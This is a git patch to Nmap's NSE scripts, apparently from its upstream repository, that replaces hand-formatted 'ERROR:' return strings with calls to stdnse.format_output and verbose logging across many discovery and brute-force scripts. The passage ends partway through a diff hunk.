From 7852fa3c186e032908488db05b1ce4939fc3a40e Mon Sep 17 00:00:00 2001 From: dmiller Date: Thu, 27 Aug 2015 20:43:55 +0000 Subject: [PATCH] Remove many ERROR outputs from non-debug NSE output --- scripts/ajp-auth.nse | 4 +- scripts/ajp-brute.nse | 2 +- scripts/ajp-headers.nse | 4 +- scripts/ajp-methods.nse | 4 +- scripts/ajp-request.nse | 2 +- scripts/bitcoin-getaddr.nse | 8 +-- scripts/bitcoin-info.nse | 6 ++- scripts/bjnp-discover.nse | 2 +- scripts/broadcast-ataoe-discover.nse | 8 ++- scripts/broadcast-dhcp-discover.nse | 6 ++- scripts/broadcast-eigrp-discovery.nse | 8 +-- scripts/broadcast-igmp-discovery.nse | 2 +- scripts/broadcast-listener.nse | 14 ++--- scripts/broadcast-networker-discover.nse | 4 +- scripts/broadcast-pc-anywhere.nse | 2 +- scripts/broadcast-pc-duo.nse | 2 +- scripts/broadcast-pim-discovery.nse | 2 +- scripts/broadcast-pppoe-discover.nse | 4 +- scripts/broadcast-ripng-discover.nse | 2 +- scripts/broadcast-sybase-asa-discover.nse | 2 +- scripts/broadcast-tellstick-discover.nse | 4 +- scripts/broadcast-wake-on-lan.nse | 5 +- scripts/broadcast-wpad-discover.nse | 6 ++- scripts/cups-info.nse | 4 +- scripts/cups-queue-info.nse | 4 +- scripts/cvs-brute-repository.nse | 2 +- scripts/cvs-brute.nse | 2 +- scripts/dict-info.nse | 2 +- scripts/distcc-cve2004-2687.nse | 2 +- scripts/dns-blacklist.nse | 10 ++-- scripts/dns-client-subnet-scan.nse | 4 +- scripts/dns-random-srcport.nse | 63 +++++------------------ scripts/dns-random-txid.nse | 63 +++++------------------ scripts/dns-srv-enum.nse | 4 +- scripts/dns-update.nse | 2 +- scripts/domcon-cmd.nse | 10 ++-- scripts/giop-info.nse | 6 ++- scripts/gkrellm-info.nse | 2 +- scripts/gpsd-info.nse | 2 +- scripts/http-auth-finder.nse | 2 +- scripts/http-backup-finder.nse | 2 +- scripts/http-brute.nse | 2 +- scripts/http-cisco-anyconnect.nse | 2 +- scripts/http-comments-displayer.nse | 2 +- scripts/http-csrf.nse | 2 +- scripts/http-default-accounts.nse | 3 +- scripts/http-devframework.nse | 2 +- scripts/http-dombased-xss.nse | 2 +- scripts/http-domino-enum-passwords.nse | 9 ++-- scripts/http-errors.nse | 2 +- scripts/http-feed.nse | 2 +- scripts/http-fetch.nse | 2 +- scripts/http-fileupload-exploiter.nse | 2 +- scripts/http-google-malware.nse | 7 +-- scripts/http-grep.nse | 2 +- scripts/http-headers.nse | 14 ++--- scripts/http-icloud-findmyiphone.nse | 2 +- scripts/http-icloud-sendmsg.nse | 2 +- scripts/http-iis-webdav-vuln.nse | 6 ++- scripts/http-method-tamper.nse | 2 +- scripts/http-open-redirect.nse | 2 +- scripts/http-phpself-xss.nse | 2 +- scripts/http-proxy-brute.nse | 2 +- scripts/http-referer-checker.nse | 2 +- scripts/http-rfi-spider.nse | 2 +- scripts/http-sitemap-generator.nse | 2 +- scripts/http-sql-injection.nse | 2 +- scripts/http-stored-xss.nse | 4 +- scripts/http-unsafe-output-escaping.nse | 2 +- scripts/http-userdir-enum.nse | 20 ++----- scripts/http-virustotal.nse | 2 +- scripts/http-vlcstreamer-ls.nse | 2 +- scripts/http-vuln-cve2011-3368.nse | 2 +- scripts/http-vuln-cve2014-2126.nse | 3 +- scripts/http-vuln-cve2014-2127.nse | 3 +- scripts/http-vuln-cve2014-2128.nse | 3 +- scripts/http-vuln-cve2014-2129.nse | 3 +- scripts/http-waf-detect.nse | 6 ++- scripts/icap-info.nse | 2 +- scripts/imap-brute.nse | 7 +-- scripts/imap-capabilities.nse | 6 ++- scripts/informix-query.nse | 2 +- scripts/informix-tables.nse | 6 ++- scripts/ip-forwarding.nse | 4 +- scripts/iscsi-brute.nse | 2 +- scripts/isns-info.nse | 2 +- scripts/krb5-enum-users.nse | 8 +-- scripts/ldap-novell-getpass.nse | 17 +++--- scripts/ldap-search.nse | 9 ++-- scripts/llmnr-resolve.nse | 2 +- scripts/maxdb-info.nse | 10 ++-- scripts/membase-brute.nse | 2 +- scripts/membase-http-info.nse | 2 +- scripts/memcached-info.nse | 2 +- scripts/metasploit-xmlrpc-brute.nse | 2 +- scripts/mmouse-exec.nse | 2 +- scripts/mrinfo.nse | 2 +- scripts/mtrace.nse | 2 +- scripts/mysql-audit.nse | 10 ++-- scripts/mysql-dump-hashes.nse | 2 +- scripts/mysql-empty-password.nse | 2 +- scripts/mysql-query.nse | 4 +- scripts/nat-pmp-mapport.nse | 2 +- scripts/ndmp-fs-info.nse | 3 +- scripts/ndmp-version.nse | 3 +- scripts/nessus-xmlrpc-brute.nse | 2 +- scripts/oracle-brute-stealth.nse | 11 ++-- scripts/oracle-brute.nse | 9 ++-- scripts/oracle-enum-users.nse | 10 ++-- scripts/rdp-enum-encryption.nse | 6 ++- scripts/redis-brute.nse | 3 +- scripts/redis-info.nse | 2 +- scripts/riak-http-info.nse | 2 +- scripts/rlogin-brute.nse | 3 +- scripts/rpcap-info.nse | 2 +- scripts/rsync-brute.nse | 6 ++- scripts/rsync-list-modules.nse | 8 +-- scripts/sip-call-spoof.nse | 2 +- scripts/sip-enum-users.nse | 18 ++++--- scripts/sip-methods.nse | 2 +- scripts/smb-enum-processes.nse | 6 +-- scripts/smb-ls.nse | 2 +- scripts/smbv2-enabled.nse | 7 +-- scripts/smtp-brute.nse | 7 +-- scripts/snmp-brute.nse | 8 +-- scripts/snmp-ios-config.nse | 9 ++-- scripts/socks-brute.nse | 5 +- scripts/stun-info.nse | 3 +- scripts/stun-version.nse | 3 +- scripts/telnet-encryption.nse | 9 ++-- scripts/versant-info.nse | 2 +- scripts/vmauthd-brute.nse | 4 +- scripts/vnc-info.nse | 8 +-- scripts/voldemort-info.nse | 2 +- scripts/vuze-dht-info.nse | 7 ++- scripts/xdmcp-discover.nse | 2 +- scripts/xmpp-brute.nse | 7 +-- 137 files changed, 334 insertions(+), 380 deletions(-) diff --git a/scripts/ajp-auth.nse b/scripts/ajp-auth.nse index a1f7db470..c72a54c7e 100644 --- a/scripts/ajp-auth.nse +++ b/scripts/ajp-auth.nse @@ -30,13 +30,11 @@ portrule = shortport.port_or_service(8009, 'ajp13', 'tcp') local arg_path = stdnse.get_script_args(SCRIPT_NAME .. ".path") -local function fail(err) return ("\n ERROR: %s"):format(err or "") end - action = function(host, port) local helper = ajp.Helper:new(host, port) if ( not(helper:connect()) ) then - return fail("Failed to connect to AJP server") + return stdnse.format_output(false, "Failed to connect to AJP server") end local status, answer = helper:get(arg_path or "/") diff --git a/scripts/ajp-brute.nse b/scripts/ajp-brute.nse index 117368fe7..14c15769d 100644 --- a/scripts/ajp-brute.nse +++ b/scripts/ajp-brute.nse @@ -35,7 +35,7 @@ portrule = shortport.port_or_service(8009, 'ajp13', 'tcp') local arg_url = stdnse.get_script_args(SCRIPT_NAME .. ".path") or "/" -local function fail(err) return ("\n ERROR: %s"):format(err or "") end +local function fail(err) return stdnse.format_output(false, err) end Driver = { diff --git a/scripts/ajp-headers.nse b/scripts/ajp-headers.nse index caa11370b..3ef2febd2 100644 --- a/scripts/ajp-headers.nse +++ b/scripts/ajp-headers.nse @@ -31,8 +31,6 @@ categories = {"discovery", "safe"} local arg_path = stdnse.get_script_args(SCRIPT_NAME .. '.path') or "/" -local function fail(err) return ("\n ERROR: %s"):format(err or "") end - action = function(host, port) local method local helper = ajp.Helper:new(host, port) @@ -42,7 +40,7 @@ action = function(host, port) helper:close() if ( not(status) ) then - return fail("Failed to retrieve server headers") + return stdnse.format_output(false, "Failed to retrieve server headers") end return stdnse.format_output(true, response.rawheaders) end diff --git a/scripts/ajp-methods.nse b/scripts/ajp-methods.nse index db98c9d50..db38433fd 100644 --- a/scripts/ajp-methods.nse +++ b/scripts/ajp-methods.nse @@ -51,13 +51,11 @@ local function filter_out(t, filter) return result end -local function fail(err) return ("\n ERROR: %s"):format(err or "") end - action = function(host, port) local helper = ajp.Helper:new(host, port) if ( not(helper:connect()) ) then - return fail("Failed to connect to server") + return stdnse.format_output(false, "Failed to connect to server") end local status, response = helper:options(arg_url) diff --git a/scripts/ajp-request.nse b/scripts/ajp-request.nse index ea83973d7..f32bbb04d 100644 --- a/scripts/ajp-request.nse +++ b/scripts/ajp-request.nse @@ -52,7 +52,7 @@ local arg_file = stdnse.get_script_args(SCRIPT_NAME .. ".filename") local arg_username = stdnse.get_script_args(SCRIPT_NAME .. ".username") local arg_password = stdnse.get_script_args(SCRIPT_NAME .. ".password") -local function fail(err) return ("\n ERROR: %s"):format(err or "") end +local function fail(err) return stdnse.format_output(false, err) end action = function(host, port) diff --git a/scripts/bitcoin-getaddr.nse b/scripts/bitcoin-getaddr.nse index 87782bfcf..cffe61840 100644 --- a/scripts/bitcoin-getaddr.nse +++ b/scripts/bitcoin-getaddr.nse @@ -38,23 +38,25 @@ categories = {"discovery", "safe"} portrule = shortport.port_or_service(8333, "bitcoin", "tcp" ) +local function fail(err) return stdnse.format_output(false, err) end + action = function(host, port) local bcoin = bitcoin.Helper:new(host, port, { timeout = 20000 }) local status = bcoin:connect() if ( not(status) ) then - return "\n ERROR: Failed to connect to server" + return fail("Failed to connect to server") end local status, ver = bcoin:exchVersion() if ( not(status) ) then - return "\n ERROR: Failed to extract version information" + return fail("Failed to extract version information") end local status, nodes = bcoin:getNodes() if ( not(status) ) then - return "\n ERROR: Failed to extract address information" + return fail("Failed to extract address information") end bcoin:close() diff --git a/scripts/bitcoin-info.nse b/scripts/bitcoin-info.nse index 2ed730f49..803ce766b 100644 --- a/scripts/bitcoin-info.nse +++ b/scripts/bitcoin-info.nse @@ -35,6 +35,8 @@ categories = {"discovery", "safe"} portrule = shortport.port_or_service(8333, "bitcoin", "tcp" ) +local function fail(err) return stdnse.format_output(false, err) end + action = function(host, port) local NETWORK = { @@ -46,12 +48,12 @@ action = function(host, port) local status = bcoin:connect() if ( not(status) ) then - return "\n ERROR: Failed to connect to server" + return fail("Failed to connect to server") end local status, ver = bcoin:exchVersion() if ( not(status) ) then - return "\n ERROR: Failed to extract version information" + return fail("Failed to extract version information") end bcoin:close() diff --git a/scripts/bjnp-discover.nse b/scripts/bjnp-discover.nse index 1e7f31138..2547fa0bc 100644 --- a/scripts/bjnp-discover.nse +++ b/scripts/bjnp-discover.nse @@ -37,7 +37,7 @@ portrule = shortport.portnumber({8611, 8612}, "udp") action = function(host, port) local helper = bjnp.Helper:new(host, port) if ( not(helper:connect()) ) then - return "\n ERROR: Failed to connect to server" + return stdnse.format_output(false, "Failed to connect to server") end local status, attrs if ( port.number == 8611 ) then diff --git a/scripts/broadcast-ataoe-discover.nse b/scripts/broadcast-ataoe-discover.nse index 5037a03df..7a4e243ad 100644 --- a/scripts/broadcast-ataoe-discover.nse +++ b/scripts/broadcast-ataoe-discover.nse @@ -117,24 +117,22 @@ local function sendConfigInfoRequest(iface) dnet:ethernet_close() end -local function fail(err) return ("\n ERROR: %s"):format(err or "") end - action = function() local iname = nmap.get_interface() if ( not(iname) ) then - stdnse.debug1("No interface supplied, use -e") + stdnse.verbose1("No interface supplied, use -e") return end if ( not(nmap.is_privileged()) ) then - stdnse.debug1("not running for lack of privileges") + stdnse.verbose1("not running for lack of privileges") return end local iface = nmap.get_interface_info(iname) if ( not(iface) ) then - return fail("Failed to retrieve interface information") + return stdnse.format_output(false, "Failed to retrieve interface information") end local pcap = nmap.new_socket() diff --git a/scripts/broadcast-dhcp-discover.nse b/scripts/broadcast-dhcp-discover.nse index cf74e5b13..63c240b34 100644 --- a/scripts/broadcast-dhcp-discover.nse +++ b/scripts/broadcast-dhcp-discover.nse @@ -149,6 +149,8 @@ local commasep = { end } +local function fail (err) return stdnse.format_output(false, err) end + action = function() local host, port = "255.255.255.255", 67 @@ -173,7 +175,7 @@ action = function() interfaces = getInterfaces("ethernet", "up") end - if( not(interfaces) ) then return "\n ERROR: Failed to retrieve interfaces (try setting one explicitly using -e)" end + if( not(interfaces) ) then return fail("Failed to retrieve interfaces (try setting one explicitly using -e)") end local transaction_id = bin.pack(" 6 then - return "\n ERROR: kparams should be of size 6." + return fail("kparams should be of size 6.") else k = {} k[1] = string.sub(kparams, 1,1) @@ -221,7 +223,7 @@ action = function() -- If an interface was provided, get its information interface = nmap.get_interface_info(interface) if not interface then - return ("\n ERROR: Failed to retrieve %s interface information."):format(interface) + return fail(("Failed to retrieve %s interface information."):format(interface)) end interfaces = {interface} stdnse.debug1("Will use %s interface.", interface.shortname) @@ -264,7 +266,7 @@ action = function() stdnse.debug1("Will use %s A.S value.", astab[1]) as = astab[1] else - return "\n ERROR: Couldn't get an A.S value." + return fail("Couldn't get an A.S value.") end end diff --git a/scripts/broadcast-igmp-discovery.nse b/scripts/broadcast-igmp-discovery.nse index 65936fcf6..2b21a24ea 100644 --- a/scripts/broadcast-igmp-discovery.nse +++ b/scripts/broadcast-igmp-discovery.nse @@ -333,7 +333,7 @@ action = function(host, port) -- Get the interface information interface = nmap.get_interface_info(interface) if not interface then - return ("ERROR: Failed to retrieve %s interface information."):format(interface) + return stdnse.format_output(false, ("Failed to retrieve %s interface information."):format(interface)) end interfaces = {interface} stdnse.debug1("Will use %s interface.", interface.shortname) diff --git a/scripts/broadcast-listener.nse b/scripts/broadcast-listener.nse index 6eeadec02..041a47c53 100644 --- a/scripts/broadcast-listener.nse +++ b/scripts/broadcast-listener.nse @@ -105,14 +105,14 @@ loadDecoders = function(fname) local abs_fname = nmap.fetchfile(fname) if ( not(abs_fname) ) then - return false, ("ERROR: Failed to load decoder definition (%s)"):format(fname) + return false, ("Failed to load decoder definition (%s)"):format(fname) end local env = setmetatable({Decoders = {}}, {__index = _G}); local file = loadfile(abs_fname, "t", env) if(not(file)) then stdnse.debug1("Couldn't load decoder file: %s", fname) - return false, "ERROR: Couldn't load decoder file: " .. fname + return false, "Couldn't load decoder file: " .. fname end file() @@ -120,7 +120,7 @@ loadDecoders = function(fname) local d = env.Decoders if ( d ) then return true, d end - return false, "ERROR: Failed to load decoders" + return false, "Failed to load decoders" end --- @@ -223,6 +223,8 @@ getInterfaces = function(link, up) return result end +local function fail (err) return stdnse.format_output(false, err) end + action = function() local DECODERFILE = "nselib/data/packetdecoders.lua" @@ -234,7 +236,7 @@ action = function() local iinfo, err = nmap.get_interface_info(iface) if ( not(iinfo.address) ) then - return "\n ERROR: The IP address of the interface could not be determined ..." + return fail("The IP address of the interface could not be determined") end interfaces = { { name = iface, address = iinfo.address } } @@ -245,12 +247,12 @@ action = function() -- make sure we have at least one interface to start sniffing if ( #interfaces == 0 ) then - return "\n ERROR: Could not determine any valid interfaces" + return fail("Could not determine any valid interfaces") end -- load the decoders from file local status, Decoders = loadDecoders(DECODERFILE) - if ( not(status) ) then return "\n " .. Decoders end + if ( not(status) ) then return fail(Decoders) end -- create a local table to handle instantiated decoders local decodertab = { udp = {}, ether = {} } diff --git a/scripts/broadcast-networker-discover.nse b/scripts/broadcast-networker-discover.nse index 7d031d204..b8a15369a 100644 --- a/scripts/broadcast-networker-discover.nse +++ b/scripts/broadcast-networker-discover.nse @@ -58,8 +58,6 @@ local function Callit( host, port, program, protocol ) return true, results end -local function fail(err) return ("\n ERROR: %s"):format(err or "") end - action = function() local results = {} @@ -80,7 +78,7 @@ action = function() -- warn about problematic sends on OS X requiring the interface to be -- supplied as part of IPv6 if ( not(status) and results == "Portmap.Callit: Failed to send data" ) then - return fail("Failed sending data, try supplying the correct interface using -e") + return stdnse.format_output(false, "Failed sending data, try supplying the correct interface using -e") end if ( status ) then diff --git a/scripts/broadcast-pc-anywhere.nse b/scripts/broadcast-pc-anywhere.nse index 6a64868a2..18ca5631c 100644 --- a/scripts/broadcast-pc-anywhere.nse +++ b/scripts/broadcast-pc-anywhere.nse @@ -39,7 +39,7 @@ action = function() for i=1,2 do local status = socket:sendto(host, port, "NQ") if ( not(status) ) then - return "\n ERROR: Failed to send broadcast request" + return stdnse.format_output(false, "Failed to send broadcast request") end end diff --git a/scripts/broadcast-pc-duo.nse b/scripts/broadcast-pc-duo.nse index 35fef3cac..ae399ec09 100644 --- a/scripts/broadcast-pc-duo.nse +++ b/scripts/broadcast-pc-duo.nse @@ -44,7 +44,7 @@ local function udpProbe(probe, responses) for i=1,2 do local status = socket:sendto(probe.host, probe.port, probe.data) if ( not(status) ) then - return "\n ERROR: Failed to send broadcast request" + return stdnse.format_output(false, "Failed to send broadcast request") end end diff --git a/scripts/broadcast-pim-discovery.nse b/scripts/broadcast-pim-discovery.nse index 816cd295b..35712c333 100644 --- a/scripts/broadcast-pim-discovery.nse +++ b/scripts/broadcast-pim-discovery.nse @@ -159,7 +159,7 @@ action = function() interface = getInterface(mcast) end if not interface then - return ("\n ERROR: Couldn't get interface for %s"):format(mcast) + return stdnse.format_output(false, ("Couldn't get interface for %s"):format(mcast)) end stdnse.debug1("will send via %s interface.", interface.shortname) diff --git a/scripts/broadcast-pppoe-discover.nse b/scripts/broadcast-pppoe-discover.nse index 757f4cfdd..035a91578 100644 --- a/scripts/broadcast-pppoe-discover.nse +++ b/scripts/broadcast-pppoe-discover.nse @@ -43,9 +43,7 @@ prerule = function() end local function fail(err) - if ( err ) then - return ("\n ERROR: %s"):format(err) - end + return stdnse.format_output(false, err) end local function discoverPPPoE(helper) diff --git a/scripts/broadcast-ripng-discover.nse b/scripts/broadcast-ripng-discover.nse index 9ca99dcdf..684b01576 100644 --- a/scripts/broadcast-ripng-discover.nse +++ b/scripts/broadcast-ripng-discover.nse @@ -147,7 +147,7 @@ RIPng = { } } -local function fail(err) return ("\n ERROR: %s"):format(err or "") end +local function fail(err) return stdnse.format_output(false, err) end -- Parses a RIPng response -- @return ret string containing the routing table diff --git a/scripts/broadcast-sybase-asa-discover.nse b/scripts/broadcast-sybase-asa-discover.nse index 899a9f1cb..a7aa6f8b1 100644 --- a/scripts/broadcast-sybase-asa-discover.nse +++ b/scripts/broadcast-sybase-asa-discover.nse @@ -171,7 +171,7 @@ action = function() local status, instances = helper:ping() if ( not(status) ) then - return ("\n ERROR: %s"):format(instances) + return stdnse.format_output(false, instances) end -- if we don't have any instances, silently abort diff --git a/scripts/broadcast-tellstick-discover.nse b/scripts/broadcast-tellstick-discover.nse index 05b37e47b..171f9f49f 100644 --- a/scripts/broadcast-tellstick-discover.nse +++ b/scripts/broadcast-tellstick-discover.nse @@ -27,15 +27,13 @@ categories = {"broadcast", "safe"} prerule = function() return ( nmap.address_family() == 'inet' ) end -local function fail(err) return ("\n ERROR: %s"):format(err or "") end - action = function() local socket = nmap.new_socket("udp") local host, port = { ip = "255.255.255.255" }, { number = 30303, protocol = "udp" } socket:set_timeout(5000) if ( not(socket:sendto(host, port, "D")) ) then - return fail("Failed to send discovery request to server") + return stdnse.format_output(false, "Failed to send discovery request to server") end local output = {} diff --git a/scripts/broadcast-wake-on-lan.nse b/scripts/broadcast-wake-on-lan.nse index 1c39d06af..98f1aa2db 100644 --- a/scripts/broadcast-wake-on-lan.nse +++ b/scripts/broadcast-wake-on-lan.nse @@ -39,6 +39,7 @@ local function createWOLPacket(mac) return "\xff\xff\xff\xff\xff\xff" .. string.rep(bin.pack("H", mac), 16) end +local function fail (err) return stdnse.format_output(false, err) end action = function() @@ -48,7 +49,7 @@ action = function() elseif( MAC:match("%x%x%-%x%x%-%x%x%-%x%x%-%x%x%-%x%x") ) then MAC_hex = MAC:gsub("-", "") else - return "\n ERROR: Failed to process MAC address" + return fail("Failed to process MAC address") end local host = { ip = address or "255.255.255.255" } @@ -60,7 +61,7 @@ action = function() local packet = createWOLPacket(MAC_hex) local status, err = socket:sendto(host, port, packet) if ( not(status) ) then - return "\n ERROR: Failed to send packet" + return fail("Failed to send packet") end end return stdnse.format_output(true, ("Sent WOL packet to: %s"):format(MAC)) diff --git a/scripts/broadcast-wpad-discover.nse b/scripts/broadcast-wpad-discover.nse index b6c68af18..f39fa9234 100644 --- a/scripts/broadcast-wpad-discover.nse +++ b/scripts/broadcast-wpad-discover.nse @@ -192,13 +192,15 @@ local function dhcpDiscover() end +local function fail (err) return stdnse.format_output(false, err) end action = function() local status, response, wpad if ( arg_nodhcp and arg_nodns ) then - return "\n ERROR: Both nodns and nodhcp arguments were supplied" + stdnse.verbose1("Both nodns and nodhcp arguments were supplied") + return fail("Both nodns and nodhcp arguments were supplied") end if ( nmap.is_privileged() and not(arg_nodhcp) ) then @@ -213,7 +215,7 @@ action = function() status, response = dnsDiscover() if ( not(status) ) then local services = "DNS" .. ( nmap.is_privileged() and "/DHCP" or "" ) - return ("\n ERROR: Could not find WPAD using %s"):format(services) + return fail(("Could not find WPAD using %s"):format(services)) end wpad = ("http://%s/wpad.dat"):format( response.name ) end diff --git a/scripts/cups-info.nse b/scripts/cups-info.nse index 1873b301f..8772cd65c 100644 --- a/scripts/cups-info.nse +++ b/scripts/cups-info.nse @@ -43,13 +43,11 @@ categories = {"safe", "discovery"} portrule = shortport.port_or_service(631, "ipp", "tcp", "open") -local function fail(err) return ("\n ERROR: %s"):format(err or "") end - action = function(host, port) local helper = ipp.Helper:new(host, port) if ( not(helper:connect()) ) then - return fail("Failed to connect to server") + return stdnse.format_output(false, "Failed to connect to server") end local status, printers = helper:getPrinters() diff --git a/scripts/cups-queue-info.nse b/scripts/cups-queue-info.nse index 495a40a0f..d64ec3f47 100644 --- a/scripts/cups-queue-info.nse +++ b/scripts/cups-queue-info.nse @@ -34,12 +34,10 @@ categories = {"safe", "discovery"} portrule = shortport.port_or_service(631, "ipp", "tcp", "open") -local function fail(err) return ("\n ERROR: %s"):format(err or "") end - action = function(host, port) local helper = ipp.Helper:new(host, port) if ( not(helper:connect()) ) then - return fail("Failed to connect to server") + return stdnse.format_output(false, "Failed to connect to server") end local output = helper:getQueueInfo() diff --git a/scripts/cvs-brute-repository.nse b/scripts/cvs-brute-repository.nse index 8c8d1a29f..3cb67e0f5 100644 --- a/scripts/cvs-brute-repository.nse +++ b/scripts/cvs-brute-repository.nse @@ -100,7 +100,7 @@ action = function(host, port) if ( repofile ) then f = io.open( repofile, "r" ) if ( not(f) ) then - return ("\n ERROR: Failed to open repository file: %s"):format(repofile) + return stdnse.format_output(false, ("Failed to open repository file: %s"):format(repofile)) end end diff --git a/scripts/cvs-brute.nse b/scripts/cvs-brute.nse index 6fb5adbd2..20774d5d1 100644 --- a/scripts/cvs-brute.nse +++ b/scripts/cvs-brute.nse @@ -91,7 +91,7 @@ action = function(host, port) local repo = stdnse.get_script_args("cvs-brute.repo") and { stdnse.get_script_args("cvs-brute.repo") } or getDiscoveredRepos(host) - if ( not(repo) ) then return "\n ERROR: No CVS repository specified (see cvs-brute.repo)" end + if ( not(repo) ) then stdnse.verbose1("ERROR: No CVS repository specified (see cvs-brute.repo)") end local status, result diff --git a/scripts/dict-info.nse b/scripts/dict-info.nse index 2bd59541a..e313cae86 100644 --- a/scripts/dict-info.nse +++ b/scripts/dict-info.nse @@ -37,7 +37,7 @@ categories = {"discovery", "safe"} portrule = shortport.port_or_service(2628, "dict", "tcp") -local function fail(err) return ("\n ERROR: %s"):format(err or "") end +local function fail(err) return stdnse.format_output(false, err) end action = function(host, port) local socket = nmap.new_socket() diff --git a/scripts/distcc-cve2004-2687.nse b/scripts/distcc-cve2004-2687.nse index 0e24e1810..a8a7212be 100644 --- a/scripts/distcc-cve2004-2687.nse +++ b/scripts/distcc-cve2004-2687.nse @@ -49,7 +49,7 @@ portrule = shortport.port_or_service(3632, "distcc") local arg_cmd = stdnse.get_script_args(SCRIPT_NAME .. '.cmd') or "id" -local function fail(err) return ("\n ERROR: %s"):format(err or "") end +local function fail(err) return stdnse.format_output(false, err) end action = function(host, port) diff --git a/scripts/dns-blacklist.nse b/scripts/dns-blacklist.nse index 4ce4c359b..ff666c790 100644 --- a/scripts/dns-blacklist.nse +++ b/scripts/dns-blacklist.nse @@ -109,17 +109,19 @@ local function formatResult(result) return output end +local function fail (err) return stdnse.format_output(false, err) end + dnsblAction = function(host) local helper if ( arg_services and ( not(arg_category) or "all" == arg_category:lower() ) ) then - return "\n ERROR: A service filter can't be used without a specific category" + return fail("A service filter can't be used without a specific category") elseif( "all" ~= arg_category ) then helper = dnsbl.Helper:new(arg_category, arg_mode) helper:setFilter(arg_services) local status, err = helper:validateFilter() if ( not(status) ) then - return ("\n ERROR: %s"):format(err) + return fail(("%s"):format(err)) end end @@ -153,11 +155,11 @@ end action = function(...) if ( arg_mode ~= "short" and arg_mode ~= "long" ) then - return "\n ERROR: Invalid argument supplied, mode should be either 'short' or 'long'" + return fail("Invalid argument supplied, mode should be either 'short' or 'long'") end if ( arg_IP and not(ipOps.todword(arg_IP)) ) then - return "\n ERROR: Invalid IP address was supplied" + return fail("Invalid IP address was supplied") end -- if the list argument was given, just list the services and abort diff --git a/scripts/dns-client-subnet-scan.nse b/scripts/dns-client-subnet-scan.nse index c2214502d..561c8eb18 100644 --- a/scripts/dns-client-subnet-scan.nse +++ b/scripts/dns-client-subnet-scan.nse @@ -330,12 +330,10 @@ local get_addresses = function(address, mask, domain, nameserver, port) return resp end -local function fail(err) return ("\n ERROR: %s"):format(err or "") end - action = function(host, port) if ( not(argDomain) ) then - return fail(SCRIPT_NAME .. ".domain was not specified") + return stdnse.format_output(false, SCRIPT_NAME .. ".domain was not specified") end local nameserver = (host and host.ip) or argNS diff --git a/scripts/dns-random-srcport.nse b/scripts/dns-random-srcport.nse index bbb3c716c..e4e48607d 100644 --- a/scripts/dns-random-srcport.nse +++ b/scripts/dns-random-srcport.nse @@ -3,6 +3,7 @@ local comm = require "comm" local nmap = require "nmap" local shortport = require "shortport" local string = require "string" +local stdnse = require "stdnse" description = [[ Checks a DNS server for the predictable-port recursion vulnerability. @@ -43,6 +44,8 @@ categories = {"external", "intrusive"} portrule = shortport.portnumber(53, "udp") +local function fail (err) return stdnse.format_output(false, err) end + action = function(host, port) -- TXID: 0xbeef @@ -75,11 +78,7 @@ action = function(host, port) -- Fail gracefully if not status then - if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then - return "ERROR: TIMEOUT" - else - return - end + return fail(result) end -- Update the port @@ -89,40 +88,24 @@ action = function(host, port) -- We need a minimum of 5 bytes... if (#result < 5) then - if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then - return "ERROR: Malformed response" - else - return - end + return fail("Malformed response") end -- Check TXID if (string.byte(result, 1) ~= 0xbe or string.byte(result, 2) ~= 0xef) then - if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then - return "ERROR: Invalid Transaction ID" - else - return - end + return fail("Invalid Transaction ID") end -- Check response flag and recursion if not (bit.band(string.byte(result, 3), 0x80) == 0x80 and bit.band(string.byte(result, 4), 0x80) == 0x80) then - if (nmap.verbosity() >= 1 or nmap.debugging() >= 1) then - return "ERROR: Server refused recursion" - else - return - end + return fail("Server refused recursion") end -- Check error flag if (bit.band(string.byte(result, 4), 0x0F) ~= 0x00) then - if (nmap.verbosity() >= 1 or nmap.debugging() >= 1) then - return "ERROR: Server failure" - else - return - end + return fail("Server failure") end -- Check for two Answer RRs and 1 Authority RR @@ -130,20 +113,12 @@ action = function(host, port) or string.byte(result, 6) ~= 0x01 or string.byte(result, 7) ~= 0x00 or string.byte(result, 8) ~= 0x02) then - if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then - return "ERROR: Response did not include expected answers" - else - return - end + return fail("Response did not include expected answers") end -- We need a minimum of 128 bytes... if (#result < 128) then - if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then - return "ERROR: Truncated response" - else - return - end + return fail("Truncated response") end -- Here is the really fragile part. If the DNS response changes @@ -155,21 +130,13 @@ action = function(host, port) if (string.byte(result, 118) ~= 0x00 or string.byte(result, 119) ~= 0x10) then - if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then - return "ERROR: Answer record not of type TXT" - else - return - end + return fail("Answer record not of type TXT") end -- Check for IN if (string.byte(result, 120) ~= 0x00 or string.byte(result, 121) ~= 0x01) then - if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then - return "ERROR: Answer record not of type IN" - else - return - end + return fail("Answer record not of type IN") end -- Get TXT length @@ -177,11 +144,7 @@ action = function(host, port) -- We now need a minimum of 128 + txtlen bytes + 1... if (#result < 128 + txtlen) then - if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then - return "ERROR: Truncated response" - else - return - end + return fail("Truncated response") end -- GET TXT record diff --git a/scripts/dns-random-txid.nse b/scripts/dns-random-txid.nse index 708a40e40..cd932332a 100644 --- a/scripts/dns-random-txid.nse +++ b/scripts/dns-random-txid.nse @@ -3,6 +3,7 @@ local comm = require "comm" local nmap = require "nmap" local shortport = require "shortport" local string = require "string" +local stdnse = require "stdnse" description = [[ Checks a DNS server for the predictable-TXID DNS recursion @@ -43,6 +44,8 @@ categories = {"external", "intrusive"} portrule = shortport.portnumber(53, "udp") +local function fail (err) return stdnse.format_output(false, err) end + action = function(host, port) -- TXID: 0xbabe @@ -75,11 +78,7 @@ action = function(host, port) -- Fail gracefully if not status then - if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then - return "ERROR: TIMEOUT" - else - return - end + return fail(result) end -- Update the port @@ -89,40 +88,24 @@ action = function(host, port) -- We need a minimum of 5 bytes... if (#result < 5) then - if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then - return "ERROR: Malformed response" - else - return - end + return fail("Malformed response") end -- Check TXID if (string.byte(result, 1) ~= 0xba or string.byte(result, 2) ~= 0xbe) then - if (nmap.verbosity() >= 2 or nmap.debugging() >= 1) then - return "ERROR: Invalid Transaction ID" - else - return - end + return fail("Invalid Transaction ID") end -- Check response flag and recursion if not (bit.band(string.byte(result, 3), 0x80) == 0x80 and 